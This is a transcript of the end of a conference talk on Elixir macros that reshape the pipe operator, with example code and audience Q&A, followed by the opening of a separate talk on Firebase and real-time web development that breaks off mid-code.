doesn't do what we want it to, and we know what it's supposed to do. So how would you change this program? Well, you have a couple of choices. The first thing that you could do is you could potentially corrupt your functions: you could basically paste a little adapter code into the top of each function, right?
It says if you've already hit bang, then stop; otherwise, continue. But that's not very DRY. That's not very interesting. You could also code an adapter that you would wrap around all of your functions and then pass a function plus your adapter all the way through. But that's also not very DRY, and it complicates the readability of your pipe. And you could also corrupt your compositions. So you could compose things in a different way using a different operator. That's not quite as cool as the pipe, and you lose a lot of the readability that you gained in the first place. But I started the talk by saying that in every language there comes a point where the language operators don't match the real world. And what you'd like to be able to do is extend the language by hacking into it more deeply than traditional language constructs would allow. What we really want to do is change what pipe means. And that's what this talk is about. Okay? How many of you have coded a macro in a functional language? So a couple of you back here, a couple of you over here. What about in an object-oriented language? Okay. So here's a couple of examples of macros. Macros are most popular in Lisp, right? Here's an example in one of the siblings — or one of the children — of Lisp in the language tree. This is Clojure. So I have a macro called unless. And I'm going to pass it a test and a function body. And if you see that apostrophe in front of the if, that's a quote operator. And then there's another corresponding operator called unquote that we'll talk about in a little bit. There are also macros that every developer uses every day in almost all languages. That looks like this, right? When the language breaks down, we often reach for cut and paste. When you start to see a lot of similar boilerplate and you're looking for a feature in the language that won't satisfy your boilerplate, then it's time to reach for a new tool.
And sometimes a macro is a good tool to reach for. So in Elixir — well, back up a step. In Lisp, the reason that macros are so interesting is that the representation of the code and the representation of the data are the same thing. So I can basically hack on the syntax tree using the language itself, right? And it turns out that if you look at Elixir, the same thing is true. In Lisp, you have basically a two-element list: the function and the arguments. Elixir is essentially the same thing, where you have the function, then the metadata — things like line numbers and other context — and then you have the arguments. And so what we're going to do today is actually hack this syntax tree. We're going to write code that changes what those tuples are that we put into the syntax tree at compile time. But the hacking is not going to take this form at all. We're going to write code that looks more like templates, and we're going to do mail merges into those templates at compile time. Okay? So the basic problem that we're solving is this one. Who can see the bug in this program? Let me give you a hint: the Elixir language does have side effects. Any guesses? So unless some clause is true, do this expression. When does that expression get evaluated? It's always going to call the expression, right? It's always going to call the expression. So we're going to break, right? So basically this is broken because this expression is going to be evaluated at the wrong time. Let's say we said unless true — I'm already getting myself backwards, right? Okay. Whether the clause is true or false, the expression within the parentheses is computed before the call ever happens, so we're actually calling whatever is in the expression either way. So if there's a side effect in there, we're dead, right? So it's unless things are really bad, launch the missile, right?
Or unless things are okay, launch the missile. And then we're in trouble, right? Okay. So what we'd like to do instead is a macro, right? Think of this as a mail merge that gets called at compile time, okay? So everything in the quote is going to be output into the syntax tree. Remember, we're listing this code inside the quote as raw Elixir syntax, but what's really going into the syntax tree is a series of tuples, right? The whole language is based on a series of tuples — every statement is a three-tuple in the language. So in this case, we're unquoting the clause, causing that to be evaluated right then, and then we can delay the evaluation of the expression. So that's what we're doing with the quoting and unquoting, right? Quote says dump this syntax into the syntax tree, and unquote says go ahead and compute this clause now, right? So one of the things that you'll see throughout the course of the talk is that some of this code we're delaying, and some of the code we want to execute right now. And we'll talk about tools to do so as we go. Okay. So let's go back to our program. What we'd really like to do with this game is say: as long as things are okay, continue — continue the piping process. And once things don't match that anymore, we want to break and return the last result that's happened, right? So in this case, what we're matching is the :ok atom and a wildcard, right? Erlang libraries often use a tuple of {:ok, result} or {:error, reason} to express a return code. So let's code our macro now. This is basically what we're supporting: pipe_matching with {:ok, _} — the underscore is a wildcard, the :ok is the return code. And just like with that unless, what we're really trying to do is preserve the syntax, so that I get that same beautiful expression of the pipes.
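Backing up to the unless example for a second — a minimal macro version of it might look like the sketch below. This is my own reconstruction, not the slide code, and I've named it `my_unless` to avoid colliding with Elixir's built-in; the point is that the macro receives the caller's code as unevaluated AST, so the body only runs when the generated `if` decides it should:

```elixir
defmodule MyMacros do
  # A plain function version would evaluate `expression` eagerly,
  # side effects and all, before the test is even checked.
  defmacro my_unless(clause, do: expression) do
    quote do
      # `unquote` splices the caller's AST in here; the expression
      # stays unevaluated until (and unless) the `if` takes that branch.
      if unquote(clause) do
        nil
      else
        unquote(expression)
      end
    end
  end
end

defmodule Launch do
  import MyMacros   # import also requires the macro module

  def check(ok?) do
    my_unless ok? do
      :missile_launched   # only evaluated when ok? is false
    end
  end
end

Launch.check(true)  # => nil
Launch.check(false) # => :missile_launched
```

Had `my_unless` been a function, `:missile_launched` (or any side effect in its place) would have been produced on every call, regardless of the clause.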
I want to delay the execution of the elements of the pipes until it's actually time to execute them. And so we have to use a macro — the language isn't rich enough to solve this problem without the precompile step. Everybody follow me so far? Okay. So a macro is going to be some code that executes at compile time. And typically what we're going to do with that code is change the syntax tree and create a different result. So in this case, we have a module that's called Pipe, and the __using__ macro is essentially going to be called when this module is included — we're going to use the use directive. When that's included, we're going to import Pipe, which means that I don't have to say Pipe.pipe_matching or Pipe.pipe_with — the import takes care of the qualification for me. And then I'm going to define the macros that are required. Well, the first macro that we're going to look at is pipe_matching. I'll let you digest this a little bit, then we'll take it apart. Let me point out some bits of syntax here. Of course, you see the do and end blocks, and those are exactly what you expect they are — blocks of code. There's an alternative representation of that code that can be expressed in one line, but typically you'll see it listed like this. You'll also see an anonymous function — do you see the red ampersand there? That's an anonymous function. It has one argument, and that's represented as &1 in the code there, right? So that says that this macro is going to take an expression and then my pipe segments, right? And that expression is going to be evaluated, and as long as we match — so that's match with a question mark — the expression, which we're going to calculate at compile time, then go ahead and use the first pipe segment, right?
Okay, so the way to take this apart is to think about when things are being executed. Recall that some of the stuff is going to be just mail merged, right? So just like a mail merge, in some places we're going to list the code and delay its execution, and in some places we're going to substitute in executed values. So in this case, the outer-level things that get actually executed at compile time are these, and we're going to delay execution of everything inside the quote, right? So in Norway you've got big boats — I like cruise ships. So when you see quote and unquote, think about it like this: sometimes you need to get across the cruise ship, and you might not have access to the whole corridor, right? So you have to come up one level or go down one level to get to the other side of the cruise ship. So you need to think about when you're climbing up and when you're climbing back down, right? Level one would be the code that's being executed at compile time. Level two would be the code where we're delaying the execution. So in this case, level two is the code that we're actually dropping into the macro, and everything inside the unquotes we're basically executing earlier. So our pipe_matching is using another construct that you haven't seen yet — that we haven't written yet — called pipe_while. That pipe_while is going to take a different API, so let's take a look at it. The pipe_while is going to take a test — which is an expression that will return true or false — and then it's going to take the pipe segments. And basically it's going to pipe while that test function is true, right?
So that first function looks a lot like our pipe_matching, except rather than executing the match, we're going to reduce the pipes if our test is true, right? We want to call the next pipe in the segment if the test is true. Okay? So here's what that reduce looks like. Remember, we're going to look at this in levels — what code are we actually going to include in the compiled source tree. And that looks like this. So what I'm doing is I'm looking at everything between the quotes. And in the code between the quotes, I'm basically grabbing an accumulator, which is all the pipes that have been executed so far, right? And I could wrap this in the source tree as unquote accumulator. But if you see, I actually use that accumulator twice — once in the true statement and once in the false statement. And I don't want to execute this code twice, right? Since we have side effects, executing this twice would be a bad idea. So I grab the accumulator, and then I have a simple case — it could have been an if-then-else. And if the test is true, I want to go ahead and unquote the next segment in the pipes. And if the test is false, just return everything that I've computed so far, right? Because we're going to basically end execution right there. And if you want to look at the rest of the compile statement — that's everything inside the unquotes — this is the stuff that we're actually going to execute initially. And when you put it all together, I get an execution that looks like this. Is everybody with me so far? So this is actually a pretty cool metaphor, because along the way I've included two things. The first one is pipe_matching.
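A rough reconstruction of a pipe_matching macro along the lines just described might look like this. It is my own sketch — module and function names are mine, and it leans on `Macro.unpipe/1` and `Macro.pipe/3` from the standard library rather than a hand-rolled reduce — but it shows the same idea: bind the accumulator once, then only apply the next segment while the value still matches:

```elixir
defmodule MyPipe do
  # pipe_matching(pattern, data |> f() |> g())
  # Keeps piping while the running value matches `pattern`;
  # on the first mismatch, the last value falls straight through.
  defmacro pipe_matching(pattern, pipes) do
    # Macro.unpipe/1 breaks `a |> f() |> g()` into segments at compile time.
    [{first, _} | rest] = Macro.unpipe(pipes)

    Enum.reduce(rest, first, fn {segment, pos}, acc ->
      quote do
        # Bind once so the earlier steps are not evaluated twice.
        acc = unquote(acc)

        case acc do
          unquote(pattern) -> unquote(Macro.pipe(quote(do: acc), segment, pos))
          _ -> acc
        end
      end
    end)
  end
end

defmodule Roulette do
  def click({:ok, n}), do: {:ok, n + 1}
  def bang(_), do: {:error, :dead}
end

import MyPipe

result =
  pipe_matching({:ok, _},
    {:ok, 0}
    |> Roulette.click()
    |> Roulette.bang()
    |> Roulette.click())
# result is {:error, :dead} — the trailing click never runs
```

The caller keeps the ordinary `|>` syntax; the macro rewrites it at compile time into a chain of case expressions.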
So now I can pipe without exceptions — I can pipe as long as any kind of return code, which I can match with a wildcard, holds. And I also get pipe_if, so I can keep piping as long as my accumulator passes a test function, right? That gives me a lot of extra power that goes way beyond what the initial pipes do. Because pipes work great until you get into production, and then you have to start doing something besides the happy path. Okay. So the last one I want to talk about is pipe_with. It's a little bit more complicated, but not too much. And the idea is that maybe I want to wrap each individual element of my pipe in some arbitrary function. There are a number of places you might want to do so. One is that I might have exceptions that are not uniform: sometimes functions might return a return code, as they would in a typical Erlang library, and sometimes they might throw an exception. What if I want to normalize that into a single API? Well, I can do this with a simple wrapping function. So in this case, if you look down at the bang code there — in the bang code, I want to basically print that something bad has happened, and I want to raise an exception, right? And then the program looks the same: start, click, click, bang and click. Right? Okay. So the whole problem with this code is that exception. That means that we can't treat things in a uniform way anymore. I'd like to wrap that so I get a nice neat return code, rather than having to deal with both exceptions and Erlang-style return codes. Okay? So our solution is to build a wrapper. And you can see this wrapper: all it does is, if I get an error condition, I pass that error condition along; if I capture an exception, I turn it into an error condition; and otherwise I just return whatever the pipe has produced so far. Right?
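One plausible shape for such a wrapper — my own reconstruction, with my own names, rather than the slide code — short-circuits on an existing error and converts a raise into an error tuple:

```elixir
defmodule Safely do
  # If an earlier step already failed, pass the error straight along.
  def call({:error, _} = err, _fun), do: err

  # Otherwise run the step, turning any raise into an error tuple.
  def call(acc, fun) do
    fun.(acc)
  rescue
    e -> {:error, Exception.message(e)}
  end
end

click = fn {:ok, n} -> {:ok, n + 1} end
bang  = fn _ -> raise "bang" end

result =
  {:ok, 0}
  |> Safely.call(click)   # {:ok, 1}
  |> Safely.call(bang)    # the raise becomes {:error, "bang"}
  |> Safely.call(click)   # skipped: the error passes through
# result is {:error, "bang"}
```

Threading `Safely.call` by hand like this works, but it clutters every step — which is exactly the clutter pipe_with removes.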
Exactly what you'd expect the pipe code to do. Which is great, except that if I had to wrap this individually around each pipe element, the application code would be ugly. Instead, I'd like to keep the same original intent of the start, click, bang, click. Right? So this is the program I want to write. But you can see that the pipe expression starts with pipe_with, right, passing it my function that wraps each element. The way this is going to look is that we're basically going to wrap each individual roulette function with our exception wrapper. And it's not just about exceptions — maybe I'm doing something with matrix math. So I have a couple of functions, and I want to operate over a list like this, doing the same math on every element of the list. Wouldn't it be great if I could start with that matrix and then pipe that into plus one and pipe that into times two, and get a result with the math done on all those elements? Right? So essentially what I'm doing is taking every arbitrary function in the pipe list and wrapping it with another function. But I'm not doing this by writing extra code — by making all the consumers of my API write a lot of extra code — I'm doing it by changing the pipe operator itself, so that my clients can do this. So the magic is just a little bit more complicated than what we've done so far, but not too much. In this case, I'm creating the macro called pipe_with, and it looks exactly like the first couple, except instead of reduce_if, I'm using reduce_with. Right? So that's an anonymous function. I'm taking as the first argument the function that I'm wrapping, right? And the second argument is the pipe segments. And then I'm going to call reduce, and reduce takes a couple of arguments. First is some collection — in this case, our list of pipe segments.
And the second argument is the function that you're going to apply across all the segments, right? So in this case, I'm just going to pass it a simple reduce. And this is what my reduce_with statement looks like. Basically, I'm taking a single pipe segment, the execution so far, and the function that I'm wrapping around it — that's the outer function, that g function that I was wrapping around the f1 and the f2, right? So let's look at the template that I'm creating. And again, this is the code that's going to be substituted at compile time. Here I'm saying the inner function is an anonymous function, and I'm going to wrap the outer function around the inner function — you see that bottom outer, that's the outer function. And then I'm going to call that with the accumulator and the inner function. That's it. So now, if I am doing some matrix math, I have a little merge_list function that basically takes a function and calls it on all the elements. And then when it's time to pipe those, I'm going to do my math with pipe_with, right? So if I'm working with a list, I just merge a list. And if I'm working with a matrix, I merge lists, which are two elements deep. And I could probably make this more generalized, but you get the idea. So now, by building this, I've built a domain-specific language that can work with individual numbers, with lists, or with matrices, just by changing the pipe operator. Now, this is probably not something that I would give every developer in my organization.
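Put together, a pipe_with along these lines might look like this sketch — again my own reconstruction on top of `Macro.unpipe/1` and `Macro.pipe/3`, with my own module names, not the code from the slides:

```elixir
defmodule MyPipeWith do
  # pipe_with(wrapper, data |> f() |> g())
  # Rewrites the pipeline so every step runs as wrapper.(acc, step_fun).
  defmacro pipe_with(wrapper, pipes) do
    [{first, _} | rest] = Macro.unpipe(pipes)

    Enum.reduce(rest, first, fn {segment, pos}, acc ->
      # Turn each segment into an inner fn, then hand the accumulator
      # and that inner fn to the caller's wrapper (the "outer" function).
      inner = quote do
        fn x -> unquote(Macro.pipe(quote(do: x), segment, pos)) end
      end

      quote do
        unquote(wrapper).(unquote(acc), unquote(inner))
      end
    end)
  end
end

defmodule M do
  def plus(n, amount), do: n + amount
  def times(n, factor), do: n * factor
  # Wrapper: apply each pipe step to every element of a list.
  def merge_list(list, fun), do: Enum.map(list, fun)
end

import MyPipeWith

result =
  pipe_with(&M.merge_list/2,
    [1, 2, 3]
    |> M.plus(1)
    |> M.times(2))
# result is [4, 6, 8]
```

Swapping the wrapper swaps the semantics: pass the exception wrapper from earlier and the same pipeline normalizes raises into error tuples; pass `merge_list` and it maps the steps over a collection.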
But if I'm building a statistics library, it would be great to have a core team that built some of the matrix operators and have business users applying those operators to the matrices. Very powerful technique. So I realize that I'm running early so far — I'm going to stop and pause for questions. Yeah. Okay. So, /2 basically means that this is a function that has two arguments. That's all, right? Basically, Elixir auto-exports everything, and in Erlang, every function has an arity with it. So there may be, for example — in this case — a merge_list/1 and a merge_list/2, which are different functions. Yeah. Other questions? Okay. So basically, the overall concept that I want to get across is not that everybody should run home, find a language, find macros, and start cranking out macros, right? This stuff is tough and it's terse — it's metaprogramming. The concept that I'm trying to get across is that when you have a language, and the language is not powerful enough to handle the idioms that your organization needs to throw at it, then macros are a game changer, right? And the idea that you can combine two concepts — a very rich syntax and macros based on a uniform syntax tree — is pretty interesting. It's novel and it's a pretty new concept. So in general, programming is about thinking, and pipes help us think, and macros can extend the concepts of pipes. Okay, let's take more questions. Should we go back and look at any of the earlier examples, or what would you guys like to see?
Say again? Say it one more time — I can't hear. Oh, the unquote, yes. Yeah, so basically what happens is, whenever you say quote, you're stepping back a level, and you're saying: rather than evaluating this code, treat it as text — this is text, right? So when you say unquote, you're saying, okay, except this part — I want this part to be actually evaluated now, to be compiled now. Yes. So the question is, if you have something like side effects in quotes, would you use a variable, something like that? If you remember, I had a situation exactly like that. Yes. So basically — I mean, there are some things that are going to be accessible to macros and some things that aren't. The rules are not as strict as you would think, right? So I saw a demonstration by a guy that I mentioned earlier in the talk — his name is Chris McCord — and he actually did his Unicode substitutions based on hitting an HTTP source that pulled down the actual Unicode data from an authority, and then did the translation at that time, right, in the macro. Which is pretty cool. So the lines aren't as hard as you would think they are. Now, that's not something I would do in my application, right, because I want compile time to be compile time — I don't want my tests to behave in a certain way and so forth. Basically, what we're doing is we're compiling in different steps, right? So, delaying execution: in this case I have acc = unquote(accumulator), so basically I'm delaying the compilation of that expression — no, I'm actually delaying the compilation of everything around it; I'm delaying this compilation until later in the compile process, right? The execution will still happen at runtime, right?
And this code I'm actually compiling now — I'm managing the expression now. Does that make sense? More questions? Yeah. It's always very difficult. So did you, by any chance, sit through the detox this morning? So basically what he said was — and these are the tools for debugging the generated code — he said, but they're not very good and it's hard. I went to an F# session yesterday, and he talked about macros, and he said, well, debugging these is hard, and so on and so forth, right? So there's a guy named Stu Halloway, and Stu Halloway is one of the most influential people in the Clojure community. He has a book on Clojure with a chapter on macros — one of the best chapters on macros I've ever seen — and he quotes the movie Fight Club. He says the first rule about macros is don't use macros, right? But if you do, this is what you need to know. Yeah, I was thinking, is there some good guidance on when to use them? Because they are obviously extremely powerful. Yes. Seems like it can be very obscure behavior to come back to in the code later. Yes. And that is the issue, right? So basically, the alternative to macros is to use a language where you can't deal with these kinds of paradigms in this way. So you wind up using other paradigms, like the cut-and-paste keys, right? And the alternative to cutting and pasting maybe some 600, 700 times in your code base is a macro. A good example: Ruby on Rails has the same concept with open classes. Rather than code all the database interfaces — when it has a has-many relationship, there are some 16 methods that you have to code up to manage that relationship fully — I type has_many :people. Department has_many :people, and I'm done, right? That to me is a good usage of a macro. It does a couple of things.
First, it encapsulates domain logic that the language could know nothing about, right? Second, it dries up my code an awful lot. And third, it's something that I can't do with the basic language as it is, right? So I use some combination of those rules to think about macros. But you're feeling uneasy right now, and you should be feeling uneasy right now. I mean, if you take two things out of the talk, you should take these two. The first one is that macros are game changers for a language, right? They can let you keep using constructs which would otherwise become absolutely useless in production. So if I had, for example, a typical Erlang library — half would be throwing exceptions, half would be returning an error code — I can't pipe anymore. And that's dramatically different, when I'm talking about piping and code readability, than not, right? If macros enable that, that's a powerful thing, and that's a feature the language didn't have before. And the second thing is that while this stuff is possible, and while it's easier and cleaner in languages that do macros in this way, it's difficult, right? And like you say, there are some tools that can help you in the debugging process — there's a debugger in Elixir — but it's still very difficult, right? Because some of these macros are used to build the language itself. So, great question. I wish I had a better answer for you, but you asked, should I be scared? I said, yeah. And you asked, kind of, is this important? And I said, yeah. More questions? Yeah. So to me, this feels very much like the maybe monad. Could you expand your macro set to do monads in general? Yeah, so basically the question is, this looks a lot like the Maybe monad in Haskell.
And for those of you who don't code Haskell: one of the problems with traditional languages — like many of the ones we use and probably many represented in this room — is that the types don't convey enough information. For example, in my language, Ruby, I have a string: the string might be empty, the string might be null, the string might have content, right? And so I find myself coding special cases a lot when, in fact, many strings might never be allowed to be blank, and many functions may return a string or something else. And if it does return something else, I want my compiler to tell me that I have to deal with that scenario. Did I capture your question right? And this allows me to deal with some of those scenarios in a more obscure way, right? So this language isn't as rich as Haskell — the type system isn't as rich. With macros, it doesn't have to be. So I can make those kinds of value judgments on whether I want all of the baggage that comes with a rich type system. Now, I say the word baggage, and lest I get a lot of hate mail: I'm writing a book now called Seven More Languages in Seven Weeks, based on the book I wrote three years ago. And every one of the seven-in-seven books tells a story. The story that we were telling in the last book was that functional languages are coming — I don't know what the winner is going to be, you'd better start paying attention. Well, the message for this set of books is that we are starting to refine what it means to be an effective functional language. And one of the things that's happening is that the pendulum is swinging back toward more strongly typed languages. So we looked at Agda — we didn't do that — but we're doing Idris, which has dependent types. And we're doing Elm, which is strongly typed, which is basically salvation: if you guys are worried about callback hell in the browser, check out Elm.
It's absolutely stunning. But the problem with monads is that they are not accessible to the common man. I know I butchered a chapter with monads in my last book, but one of the things that Elm — and in some places Elixir — does is encapsulate the ideas behind monads in a much more accessible way, I think. And, you know, it's because we've had time to think about these things and get them right. So, that's an ineffective way of saying, I don't know. More questions? Thank you so much.
Elixir pipes have captured the imagination of the Elixir community. Joe Armstrong's first blog about the language, Dave Thomas's book title for Programming Elixir, and the creator of the language have all mentioned pipes as a core feature for understanding not just Elixir, but also how functional transformation works. In this talk, we'll learn to use macros to push pipes harder than you ever thought possible. Elixir programmers will learn to write prettier code, and others will learn why functional programming and macros are such a big deal.
10.5446/50587 (DOI)
So, now I think it's time to get started. Thank you all for coming. I know it's tough to get people to come to each individual talk, because there are a lot of awesome talks going on at the moment, so I'm glad to see you guys here. As you hopefully know, the topic is kind of my look at the cloud beyond scaling, and some of the stuff that you can do utilizing the cloud beyond what you've probably already heard a thousand times by now. So, this is me — just a short introduction. My name is Christian, and I'm a Danish developer. I've been one for nine and a half years by now, mostly working in .NET with web development — for most of the time doing e-commerce sites, but also working along with BI consultants and doing some stuff in that space. The agenda for today is that, first of all, I'm just going to talk a bit about what I mean with this whole beyond-scaling thing, and then I'll talk a bit about real time on the web and what that means in the scope of this talk. Then I'll give a short introduction to Firebase, and then look at some of the ways that you can work with Firebase along with some of the frameworks that you might already know — covering a little bit of Angular, then showing how it wires up with Firebase, and doing the same thing with Ember as well. And then, finally, we'll look at some use cases that you guys can hopefully find for technologies along these lines. Well, starting out, just so you get the whole story: I used to work at a company where we, like probably a lot of you, were starting to move to the cloud, and being a .NET shop, that meant moving to Azure. And that was kind of what we were doing with all of our new projects, and also with some older projects that were in a state where it was possible at the time, I would say.
And the basic idea starting out was, as you've probably heard a million times at different talks, about scalability, elasticity, about how you could outsource hosting and get fast provisioning, which is all very awesome. But at some point, we also got to talking about whether there was more business value to get from this. Not that I'm in any way, you know, not thinking that the cloud in and by itself provides a lot of value, but we just felt like there was more to get out of this whole switch. And one of the places we started looking was in this backend-as-a-service space, you could say, of cloud technologies. And kind of some of the things that were resonating with us was the idea of, for some types of projects, being able to do some kind of rapid development and also combining different clouds, not just being with Azure, but also seeing what others could provide in the same space. It was also about kind of not having to, say, stick with either Windows or Linux, but being able to use the best tools out there no matter where they ran. And also, to some extent, getting beyond having to choose who to work with because of their favorite programming language. Why should that matter? If the domain is interesting enough, if whoever you're working with knows enough about a certain domain, they should be the people to work with, not just because they are C# developers, Java developers, or whatnot. So, yeah, that was kind of some of the initial thoughts in this. And of course, still being a .NET shop, we started looking at Azure Mobile Services, which is definitely interesting in and by itself. But it's also very much the straightforward use case, you might say, for backend-as-a-service systems. Because it provides you some way of working with data that is simple, provides you with authentication and push notifications and some kind of services for recurring jobs, which was pretty much the same types of applications that we were already building.
So, it certainly has its use cases, but again, we were looking to do something a bit different. So, we stumbled on nobackend.org. I don't know if you guys know this site at all. But it covers some of the different platforms out there. And, yeah, we had a look across some of these and found that there were actually some really interesting ideas amongst those that could also enable us to do new types of applications. One of the things that kind of caught our interest was being able to work with real-time data. At the time, I was working a lot with BI people and making sure basically that companies were able to see their data in real time and kind of navigate their company based on that data. So, it needed to be as current as at all possible. And just going back a few years, really, talking about real time on the web, that was more or less about refreshing the browser every X number of seconds, right? So, we didn't really have much to work with in that space. Of course, the natural thing for us, again, being a .NET shop, we did look at SignalR, which is really awesome in this space for doing real-time collaboration and working with WebSockets. And it's fairly easy to get started with. This is pretty much all that you need on the server side: you inherit from a hub and then you implement your messages, and then through dynamic methods, you get the ability to call your clients and broadcast messages and so on. And at the same time, on the client side, you can connect to this hub, call the same messages and, of course, react to messages coming back as you see here. And even though that's all nice and well, it does take quite a bit of plumbing for some of the cases that we were looking at, really, because you still need some way of hooking up a backend and working with your models and doing all the stuff that we're used to. And that was when we stumbled on Firebase. Has any of you heard of or used Firebase before? So I only see one hand.
That's not a whole lot. But yeah, that's awesome, because I am going to pretty much take you in at the bottom level of this. But yeah, the whole idea of Firebase is to give you a really easy way to work with data in real time. So the basic concept is that if you think of everything in the database as being an endpoint that has a URL and everything being structured in kind of the same manner as a JSON document, then in that regard, it is very similar to a lot of other databases that you've probably heard of. But that is pretty much where the comparison ends. Because when you start working with it, instead of just querying a node or doing some type of query like you're used to, the idea is that you subscribe to some node in this model that you're working against. And then when changes are made to the model, you have an event that is fired and you can react to these changes. So basically, doing all this is extremely simple, which was one of the first pleasant surprises I had looking at this. Because really, what you see on the screen is all you need to know of the API to get really, really, really far. So basically, you have a couple of ways of putting data in. In this case, I'm sticking with the JavaScript edition of the API. There are other flavors as well. But basically, you have a way of setting data. You can set it with a priority, which is pretty much specifying the index so you can sort things if it's an array you're working with. And you can push data, which pretty much just creates a reference, and then you can optionally pass that a value as well. So it's just a way of making it easier to deal with lists. And then you also have some querying capabilities, where you can say that you only want items starting at a certain priority, and you can limit the number of items returned. And then basically, the most important thing of it all is that, like a lot of other APIs, you have this on method that allows you to subscribe to different events.
And all the event types are the ones that are listed at the bottom. So basically, the value event is always called when you hook up to the database. So it gives you the entire data object that you're referencing. And then you can listen to when children are added or changed or removed or just moved around the structure. And in those cases, you'll get a snapshot back instead of the entire thing. And also, when you get started, the documentation is actually pretty good. They have some really nice examples and some quick starts. So I was fairly surprised that it didn't take more than five, ten minutes before I had the first thing running and was actually able to start thinking about the problem that I was actually trying to solve, you know, the business problem. And of course, actually, I left this slide out the other times that I've been doing the talk, because I have no association with Firebase as such. So I didn't want to, you know, get too much into the whole sales thing, but people have kept asking. So I just put in this slide to give you some idea of what it costs to get started. And basically, you know, I think this is fairly cheap and is definitely affordable for most types of products, especially in comparison to other databases kind of in the same category. Just to give you a little bit of a look behind the scenes, the technologies used to build Firebase are Scala and Netty, and then JavaScript and Node.js. So that tells you quite a bit about it all being reactive and about it being built as a reactive framework, which is what it is. As I shortly mentioned earlier, there are quite a few APIs for working with Firebase. So no matter where you're coming from, I would think you have some option of working with it. The big obvious thing, of course, is web development and doing this in JavaScript. Along the same lines, you would have an option of doing server side with Node.js. They also have an API for iOS and OS X, Java and Android.
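The subscribe-to-a-node model described above can be sketched without the real SDK. The following is a minimal in-memory illustration of the idea — you subscribe to events on a node instead of querying it — and all names here are invented for the sketch; this is not Firebase's actual code:

```javascript
// A tiny in-memory sketch of the subscription model described above.
// NOT the Firebase SDK -- just an illustration of subscribing to a node
// and reacting to value / child_added / child_changed / child_removed events.
function createNode() {
  const children = {};  // child name -> value
  const listeners = { value: [], child_added: [], child_changed: [], child_removed: [] };
  let pushCounter = 0;

  function emit(event, payload) {
    listeners[event].forEach(fn => fn(payload));
  }

  return {
    // Subscribe to an event; 'value' fires immediately with the whole node,
    // mirroring how the value callback is always called on hook-up.
    on(event, fn) {
      listeners[event].push(fn);
      if (event === 'value') fn({ ...children });
    },
    // Set a named child; fires child_added or child_changed, then value.
    set(name, value) {
      const event = name in children ? 'child_changed' : 'child_added';
      children[name] = value;
      emit(event, { name, value });
      emit('value', { ...children });
    },
    // push generates a new child name, making lists easier to deal with.
    push(value) {
      const name = 'item-' + (pushCounter++);
      this.set(name, value);
      return name;
    },
    remove(name) {
      delete children[name];
      emit('child_removed', { name });
      emit('value', { ...children });
    }
  };
}

// Usage: a "client" subscribed to the node sees each addition as it happens.
const node = createNode();
const seen = [];
node.on('child_added', snap => seen.push(snap.name));
node.push('hello');
node.push('world');
console.log(seen); // → ['item-0', 'item-1']
```

The point of the sketch is only the shape of the API: writes are events, and clients hold open subscriptions rather than repeating queries.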
And then if all else fails, there is the REST API, which is still really, really simple to use. So it shouldn't be a stumbling block to anybody, but of course, we all like to see the API in the language that we're proficient in, right? And actually, after I started speaking about this subject, I got in touch with a couple of people at Firebase and they told me that .NET is actually on the roadmap. So it's also coming to my own platform eventually. And well, actually, just while I remember to say so, again, even though I'm not associated with Firebase, they were kind enough to send me a bunch of stickers. So if you guys want some swag afterwards, I have them up here with me on stage, which they were kind enough to allow me to do. So getting back to the coding part of this, as I mentioned before, working with Firebase is pretty much a matter of signing up. Then you get a URL that you are assigned. And then you can create a Firebase reference and then set values on it. And of course, listen to all of these events. So listening to the value event that will always be called, and then the child added, child changed events and so on. It's no more work than what you see here. And with regards to transactions, which is probably an obvious question that some of you will have, the general idea is that they try to run your changes locally right away. Then it tries to commit it to the Firebase servers. And of course, if that is successful, then the callback is called. And if there's a conflict, then the client will receive the new value and the transaction will be rerun. This has been working fine for at least all of the cases I've been using it for. And as a kind of a side note, they started also providing their own hosting platform quite recently, actually. So I'm not even using it for my demos, even though I've been looking at it shortly. But Firebase hosting is basically a way of getting all your static files served.
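The optimistic transaction flow just described — apply the change locally, try to commit, and rerun on a conflict — can be sketched as a compare-and-swap loop. This mimics the idea, not Firebase's actual implementation; the store and function names are made up for illustration:

```javascript
// Sketch of the optimistic transaction flow described above: run the update
// locally, try to commit it, and rerun the update if someone else won the race.
function runTransaction(store, key, updateFn, onComplete) {
  for (;;) {
    const current = store.read(key);                    // the value the client believes in
    const updated = updateFn(current);                  // run the change locally
    const result = store.commit(key, current, updated); // compare-and-swap commit
    if (result.committed) {
      onComplete(null, updated);                        // success -> callback is called
      return;
    }
    // Conflict: the client has received a newer value; the loop reruns updateFn.
  }
}

// A toy store with compare-and-swap semantics, standing in for the servers.
function createStore(initial) {
  const data = { ...initial };
  return {
    read: key => data[key],
    commit(key, expected, value) {
      if (data[key] !== expected) return { committed: false };
      data[key] = value;
      return { committed: true };
    }
  };
}

const store = createStore({ counter: 0 });
runTransaction(store, 'counter', v => v + 1, (err, v) => console.log(v)); // → 1
```

In a single-threaded demo the loop commits on the first try; the rerun path only matters when another writer changes the value between the read and the commit.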
So it gives you a way of serving them via HTTPS. And then you get a CDN and you can choose your own custom domains and so on and use it with no tooling. So it is extremely simple. And I would actually bet that quite a few applications will only need static pages, because you'll just be serving some of the JavaScript that you'll be writing and then a bunch of HTML and CSS pages. So this is really, really kind of a lean way to get started without the hassle of a vast platform when you're not in need of such a thing. Well, just going back to the story that I went through, when we started looking at these things, the shop I was coming from was at the same time moving from working with WPF and wanting to do more web development. And it kind of makes sense in this day and age because we want to target every platform out there. And as of today, the only way to truly write once and run everywhere is still writing a web application. And for a lot of our customers, we didn't really need native support. But one of the concerns that a lot of people who had been working with WPF for a long time had was that they would kind of miss out on two-way bindings. A lot of these people had been working with the earlier frameworks where they didn't have two-way bindings, and they thought it was a pain always having to kind of write your code twice, mirrored, if you could say it that way. So they were really kind of afraid of going back to that. And it was actually something that we had to take into account when switching to the web. And first off, when you're looking at two-way bindings on the web, there's kind of two ways of going about this that the frameworks out there use today. One of them is wrapping each of your properties so that, instead of calling the property directly, you call a method. And then that will make sure that it uses some publish-subscribe mechanism to make sure that your changes are propagated.
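The "wrapping" style of binding just described can be sketched in a few lines of plain JavaScript. This is the general publish-subscribe idea behind wrapped observables (the style the speaker attributes to frameworks like Ember), not any framework's real implementation:

```javascript
// Sketch of the "wrapping" approach described above: each property becomes a
// function, so reads and writes go through it and subscribers get notified.
// A generic illustration, not any particular framework's code.
function observable(initialValue) {
  let value = initialValue;
  const subscribers = [];

  function prop(newValue) {
    if (arguments.length === 0) return value;  // called with no args: read
    value = newValue;                          // called with an arg: write...
    subscribers.forEach(fn => fn(value));      // ...and notify all subscribers
    return value;
  }
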